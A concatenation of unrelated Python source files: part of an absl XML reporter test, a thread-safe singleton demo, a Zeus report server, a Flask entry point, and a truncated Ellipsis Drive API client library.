    self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
                     '"Hi" <'>	

')
class XmlReporterFixtureTest(absltest.TestCase):
def _get_helper(self):
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
return _bazelize_command.get_executable_path(binary_name)
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def _test_for_error(self, flag, message):
"""Run the test and look for an Error with the specified message."""
    xml = self._run_test_and_get_xml(flag)
self.assertEqual(int(xml.attrib['errors']), 1)
self.assertEqual(int(xml.attrib['failures']), 0)
for msg in xml.iter('error'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s" in xml\n%s' % (
message, ElementTree.tostring(xml)))
def _test_for_failure(self, flag, message):
"""Run the test and look for a Failure with the specified message."""
    xml = self._run_test_and_get_xml(flag)
self.assertEqual(int(xml.attrib['errors']), 0)
self.assertEqual(int(xml.attrib['failures']), 1)
for msg in xml.iter('failure'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s"' % message)
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
if __name__ == '__main__':
absltest.main()
|
singleton.py
|
import threading
import time
class Single:
_INSTANCE = None
_LOCK = threading.RLock()
def __init__(self, _new=False):
if not _new:
raise Exception("Don't instancing it direct")
@classmethod
def instance(cls):
if cls._INSTANCE is None:
with cls._LOCK:
if cls._INSTANCE is None:
cls._INSTANCE = cls(True)
return cls._INSTANCE
class Single2:
_S_LOCK = threading.RLock()
def __init__(self, _new=False):
if not _new:
raise Exception("Don't instancing it direct")
@classmethod
def instance(cls):
if not hasattr(cls, "_LOCK"):
with cls._S_LOCK:
if not hasattr(cls, "_LOCK"):
cls._LOCK = threading.RLock()
if not hasattr(cls, "_INSTANCE"):
with cls._LOCK:
if not hasattr(cls, "_INSTANCE"):
cls._INSTANCE = cls(True)
return cls._INSTANCE
class UseSingle(Single):
def __init__(self):
pass
class A:
pass
def _worker():
s = Single.instance()
s2 = Single2.instance()
a = A()
u = UseSingle()
print(s, "s")
print(s2, "s2")
print(a, "a")
print(u, "u")
def new_thread(n):
tp=[]
for i in range(n):
t=threading.Thread(target=_worker)
t.start()
tp.append(t)
for t in tp:
t.join()
if __name__ == "__main__":
new_thread(5)
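# A minimal usage sketch (not part of the original demo): instance() should
# hand back the same object no matter how often, or from how many threads,
# it is called.
#
#   a = Single.instance()
#   b = Single.instance()
#   assert a is b
#   assert Single2.instance() is Single2.instance()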
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import zeus
from zeus.common import FileOps, TaskOps
from zeus.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from zeus.common import MessageServer
from zeus.common.utils import singleton
from zeus.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
def run(self):
"""Run report server."""
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
if not records:
            return []
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished:
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
# def _select_one_record(self, outs, choice='normal'):
# """Select one record."""
# if outs.size == 1:
# return outs.astype(int).tolist()
# if choice == 'normal':
# data = outs[:, 1:].reshape(-1, 1).tolist()
# prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(data[0]) + 1)]
# prob_temp = prob
# for idx, out in enumerate(data):
# sorted_ind = np.argsort(out)
# for idx, ind in enumerate(sorted_ind):
# prob[ind] += prob_temp[idx]
# normalization = [float(i) / float(sum(prob)) for i in prob]
# return [np.random.choice(len(data[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if zeus.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif zeus.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
                logging.info('Cannot read records from json because {}'.format(ex))
return records
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
if kwargs:
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = deepcopy(report_server.all_records)
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
|
main.py
|
import threading
from __init__ import app, configuration
import database.database_connection as database
if database.connect_if_required():
database.database_engine.init_app(app)
database.database_engine.create_all()
def run_schedulers():
import time
import schedule
while True:
schedule.run_pending()
time.sleep(1)
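# The scheduler loop runs in a daemon thread so it polls pending `schedule`
# jobs in the background without blocking interpreter shutdown; the jobs
# themselves are assumed to be registered elsewhere in the application.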
threading.Thread(target=run_schedulers, daemon=True).start()
if __name__ == '__main__':
if configuration.web_ssl:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port, ssl_context=(configuration.ssl_certfile, configuration.ssl_keyfile))
else:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port)
|
__init__.py
|
#python3 setup.py sdist bdist_wheel
#twine upload --repository pypi dist/*
import pandas as pd
from PIL import Image
import geopandas as gpd
from pyproj import Proj, transform
import base64
import numpy as np
from io import BytesIO
import time
import requests
import rasterio
from datetime import datetime
import math
import tifffile
from shapely.geometry import Polygon
from rasterio.features import rasterize
from geopy.distance import geodesic
import json
#import cv2
import sys
import os
from rasterio.io import MemoryFile
from requests_toolbelt import MultipartEncoder
import warnings
import threading
__version__ = '1.2.15'
url = 'https://api.ellipsis-drive.com/v1'
s = requests.Session()
warnings.filterwarnings("ignore")
def logIn(username, password):
r =s.post(url + '/account/login/',
json = {'username':username, 'password':password} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
token = r.json()
token = token['token']
token = 'Bearer ' + token
return(token)
def metadata(projectId, includeDeleted=False, token = None):
mapId = projectId
if token == None:
r = s.post(url + '/metadata',
json = {"mapId": mapId})
else:
r = s.post(url + '/metadata', headers = {"Authorization":token},
json = {"mapId": mapId, 'includeDeleted':includeDeleted})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
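# A minimal usage sketch (the credentials and project id below are hypothetical
# placeholders, not values shipped with this package):
#
#   token = logIn('my_user', 'my_password')
#   info = metadata('my-project-id', token=token)
#   print(info['timestamps'])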
def getShapes(name= None, fuzzyMatch = False, favorite = None, access = ['subscribed', 'public', 'owned'], bounds=None, userId= None, hashtag = None, limit = 100, token = None):
body = {'access': access}
if str(type(name)) != str(type(None)):
body['name'] = name
        body['nameFuzzy'] = fuzzyMatch
if str(type(favorite)) != str(type(None)):
        body['favorite'] = favorite
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(hashtag)) != str(type(None)):
body['hashtag'] = hashtag
if str(type(bounds)) != str(type(None)):
bounds = {'xMin':float(bounds['xMin']), 'xMax':float(bounds['xMax']), 'yMin':float(bounds['yMin']), 'yMax':float(bounds['yMax'])}
body['bounds'] = bounds
keepGoing = True
results = []
while keepGoing:
if token == None:
r = s.post(url + '/account/shapes', json = body )
else:
r = s.post(url + '/account/shapes', json = body,
headers = {"Authorization":token} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
result = r.json()
body['pageStart'] = result['nextPageStart']
result = result['result']
if len(result) < 100:
keepGoing = False
results = results + result
        if len(results) >= limit:
            keepGoing = False
            results = results[0:limit]
return(results)
def getMaps(name= None, fuzzyMatch = False, access = ['subscribed', 'public', 'owned'], bounds = None, userId= None, favorite = None, resolutionRange=None, dateRange=None, hashtag = None, limit = 100, token = None):
body = {'access': access}
if str(type(name)) != str(type(None)):
body['name'] = name
body['nameFuzzy'] = fuzzyMatch
if str(type(favorite)) != str(type(None)):
body['favorite'] = favorite
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(dateRange)) != str(type(None)):
body['dateFrom'] = dateRange['dateFrom'].strftime('%Y-%m-%d %H:%M:%S')
body['dateTo'] = dateRange['dateTo'].strftime('%Y-%m-%d %H:%M:%S')
if str(type(resolutionRange)) != str(type(None)):
body['resolution'] = resolutionRange
if str(type(hashtag)) != str(type(None)):
body['hashtag'] = hashtag
if str(type(bounds)) != str(type(None)):
bounds = {'xMin':float(bounds['xMin']), 'xMax':float(bounds['xMax']), 'yMin':float(bounds['yMin']), 'yMax':float(bounds['yMax'])}
body['bounds'] = bounds
keepGoing = True
results = []
while keepGoing:
if token == None:
r = s.post(url + '/account/maps', json = body )
else:
r = s.post(url + '/account/maps', json = body,
headers = {"Authorization":token} )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
result = r.json()
body['pageStart'] = result['nextPageStart']
        result = result['result']
        if len(result) < 100:
            keepGoing = False
        results = results + result
        if len(results) >= limit:
            keepGoing = False
            results = results[0:limit]
return(results)
def getBounds(projectId, timestamp = None, token = None ):
body = {"mapId": projectId}
if str(type(timestamp)) != str(type(None)):
body['timestamp'] = timestamp
else:
body['timestamp'] = 0
if token == None:
r = s.post(url + '/settings/projects/bounds',
json = body)
else:
r = s.post(url + '/settings/projects/bounds', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
r['id'] = 0
r['properties'] = {}
r = gpd.GeoDataFrame.from_features([r])
r = r.unary_union
return(r)
def geometryIds(shapeId, layerId, geometryIds, wait = 0, token = None):
body = {"mapId": shapeId, 'layerId':layerId, 'returnType':'all'}
ids_chunks = chunks( list(geometryIds))
sh = gpd.GeoDataFrame()
for chunk_ids in ids_chunks:
body['geometryIds'] = list(chunk_ids)
if token == None:
            r = s.post(url + '/geometry/get',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/get', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
time.sleep(wait)
return(sh)
def geometryGet(shapeId, layerId, filters = None, limit = None, wait = 0, token = None):
body = {"mapId": shapeId, 'layerId':layerId}
if str(type(filters)) != str(type(None)):
try:
for i in np.arange(len(filters)):
if 'float' in str(type(filters[i]['key'])):
filters[i]['value'] = float(filters[i]['value'])
if 'bool' in str(type(filters[i]['key'])):
filters[i]['value'] = bool(filters[i]['value'])
if 'int' in str(type(filters[i]['key'])):
filters[i]['value'] = int(filters[i]['value'])
if filters[i]['key'] == 'creationDate':
filters[i]['value'] = filters[i]['value'].strftime('%Y-%m-%d %H:%M:%S')
body['propertyFilter'] = filters
except:
raise ValueError('filters must be an array with dictionaries. Each dictionary should have a property, key, operator and value')
body = json.dumps(body)
print(body)
body = json.loads(body)
body['returnType'] = 'all'
keepGoing = True
sh = gpd.GeoDataFrame()
while (keepGoing):
if str(type(limit)) != str(type(None)):
limit = min(3000, limit - sh.shape[0])
body['pageSize'] = limit
if token == None:
r = s.post(url + '/geometry/get',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/get', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
if len(r['result']['features']) < 3000 and not r['truncated']:
keepGoing = False
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
body['pageStart'] = r['nextPageStart']
time.sleep(wait)
if sh.shape[0]>0:
loadingBar(sh.shape[0],sh.shape[0])
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryBounds(shapeId, layerId, xMin = None, xMax = None, yMin=None, yMax=None, filters=None, wait = 0, limit = None, token = None):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId}
if str(type(xMin)) == str(type(None)):
xMin = -180
if str(type(xMax)) == str(type(None)):
xMax = 180
if str(type(yMin)) == str(type(None)):
yMin = -85
if str(type(yMax)) == str(type(None)):
yMax = 85
body['bounds'] = {'xMin': float(xMin) , 'xMax':float(xMax), 'yMin':float(yMin), 'yMax':float(yMax)}
if str(type(filters)) != str(type(None)):
try:
for i in np.arange(len(filters)):
if 'float' in str(type(filters[i]['key'])):
filters[i]['value'] = float(filters[i]['value'])
if 'bool' in str(type(filters[i]['key'])):
filters[i]['value'] = bool(filters[i]['value'])
if 'int' in str(type(filters[i]['key'])):
filters[i]['value'] = int(filters[i]['value'])
if filters[i]['key'] == 'creationDate':
filters[i]['value'] = filters[i]['value'].strftime('%Y-%m-%d %H:%M:%S')
body['propertyFilter'] = filters
except:
raise ValueError('filters must be an array with dictionaries. Each dictionary should have a property, key, operator and value')
body = json.dumps(body)
body = json.loads(body)
body['returnType'] = 'all'
keepGoing = True
sh = gpd.GeoDataFrame()
while (keepGoing):
if str(type(limit)) != str(type(None)):
limit = min(3000, limit - sh.shape[0])
body['pageSize'] = limit
if token == None:
r = s.post(url + '/geometry/bounds',
json = body, timeout=10)
else:
r = s.post(url + '/geometry/bounds', headers = {"Authorization":token},
json = body, timeout=10)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
if len(r['result']['features']) < 3000 and not r['truncated']:
keepGoing = False
sh = sh.append(gpd.GeoDataFrame.from_features(r['result']['features']))
body['pageStart'] = r['nextPageStart']
time.sleep(wait)
if sh.shape[0]>0:
loadingBar(sh.shape[0],sh.shape[0])
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryVersions(shapeId, layerId, geometryId, token = None):
mapId = shapeId
body = {"mapId": mapId, "layerId":layerId, 'geometryId':geometryId, 'returnType':'all'}
if token == None:
r = s.post(url + '/geometry/versions',
json = body)
else:
r = s.post(url + '/geometry/versions', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()['result']
sh = gpd.GeoDataFrame()
for v in r:
sh_sub = gpd.GeoDataFrame({'geometry':[v['feature']]})
sh_sub['editUser'] = v['editUser']
sh_sub['editDate'] = v['editDate']
sh = sh.append(sh_sub)
sh.crs = {'init': 'epsg:4326'}
return(sh)
def geometryDelete(shapeId, layerId, geometryIds, token, revert= False):
body = {"mapId": shapeId, "layerId":layerId , 'geometryIds': list(geometryIds), 'rever':revert}
r= s.post(url + '/geometry/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def geometryEdit(shapeId, layerId, geometryIds, token, features = None, zoomlevels = None):
if str(type(zoomlevels)) != str(type(None)) and str(type(features)) != str(type(None)):
        raise ValueError('you can edit either features or zoomlevels, not both at the same time')
mapId = shapeId
if str(type(features)) != str(type(None)):
features = features.copy()
if 'id' in features.columns:
del features['id']
if 'userId' in features.columns:
del features['userId']
if 'attribution' in features.columns:
del features['attribution']
if not str(type(features)) == "<class 'geopandas.geodataframe.GeoDataFrame'>":
raise ValueError('features must be of type geopandas dataframe')
features = features.to_crs({'init': 'epsg:4326'})
if str(type(zoomlevels)) != str(type(None)):
zoomlevels = [int(z) for z in zoomlevels]
indices = chunks(np.arange(len(geometryIds)),1000)
i=0
for i in np.arange(len(indices)):
indices_sub = indices[i]
geometryIds_sub = geometryIds[indices_sub]
if str(type(features)) != str(type(None)):
features_sub = features.iloc[indices_sub]
features_sub =features_sub.to_json(na='drop')
features_sub = json.loads(features_sub)
if str(type(zoomlevels)) != str(type(None)) and str(type(features)) != str(type(None)):
changes = [{'geometryId':x[0] , 'newProperties':x[1]['properties'], 'newGeometry':x[1]['geometry'], 'newZoomlevels':zoomlevels} for x in zip(geometryIds_sub, features_sub['features'])]
elif str(type(zoomlevels)) != str(type(None)) and str(type(features)) == str(type(None)):
changes = [{'geometryId':geometryId, 'newZoomlevels':zoomlevels} for geometryId in geometryIds]
else:
changes = [{'geometryId':x[0] , 'newProperties':x[1]['properties'], 'newGeometry':x[1]['geometry']} for x in zip(geometryIds_sub, features_sub['features'])]
body = {"mapId": mapId, "layerId":layerId, 'changes':changes}
retried = 0
while retried <= 20:
try:
r = s.post(url + '/geometry/edit', headers = {"Authorization":token},
json = body )
retried = 21
except Exception as e:
if retried == 20:
raise ValueError(e)
retried = retried +1
time.sleep(1)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
loadingBar(i*1000 + len(indices_sub),len(geometryIds))
def geometryChangelog(shapeId, layerId, limit = 100, userId = None, pageStart = None, actions = ['add', 'delete', 'recover', 'move'], token = None):
changes = []
keepGoing = True
while keepGoing:
pageSize = min(100, limit - len(changes))
body = {'mapId':shapeId, 'layerId':layerId, 'pageSize':pageSize, 'actions':list(actions)}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(pageStart)) != str(type(None)):
body['pageStart'] = pageStart
if token ==None:
r = s.post(url + '/geometry/changeLog',
json = body )
else:
r = s.post(url + '/geometry/changeLog', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
r = r['result']
changes = changes + r
if len(changes) >= limit or str(type(pageStart)) == str(type(None)):
break
return({'changes':changes, 'pageStart':pageStart})
def geometryAdd(shapeId, layerId, features, token, zoomlevels=None):
mapId = shapeId
if not str(type(features)) == "<class 'geopandas.geodataframe.GeoDataFrame'>":
raise ValueError('features must be of type geopandas dataframe')
if str(type(features.crs)) == str(type(None)) and min(features.bounds['minx']) > -180 and max(features.bounds['maxx']) < 180 and min(features.bounds['miny']) > -90 and max(features.bounds['maxy']) < 90:
print('assuming WGS84 coordinates')
elif str(type(features.crs)) == str(type(None)):
raise ValueError('Please provide CRS for the geopandas dataframe or translate to WGS84 coordinates')
else:
features = features.to_crs({'init': 'epsg:4326'})
if str(type(None)) != str(type(zoomlevels)):
zoomlevels = [int(z) for z in zoomlevels]
firstTime = metadata(projectId = mapId, token = token)['geometryLayers']
firstTime = [x for x in firstTime if x['id'] == layerId]
if len(firstTime)==0:
raise ValueError('layer does not exist')
firstTime = len(firstTime[0]['properties']) ==0
if firstTime:
print('no properties known for this layer adding them automatically')
columns = features.columns
columns = [c for c in columns if c != 'geometry']
for c in columns:
if 'int' in str(features.dtypes[c]):
propertyType = 'integer'
features[c] = [ int(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
elif 'float' in str(features.dtypes[c]):
propertyType = 'float'
features[c] = [ float(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
elif 'bool' in str(features.dtypes[c]):
propertyType = 'boolean'
features[c] = [ bool(d) if not np.isnan(d) and d != None else np.nan for d in features[c].values ]
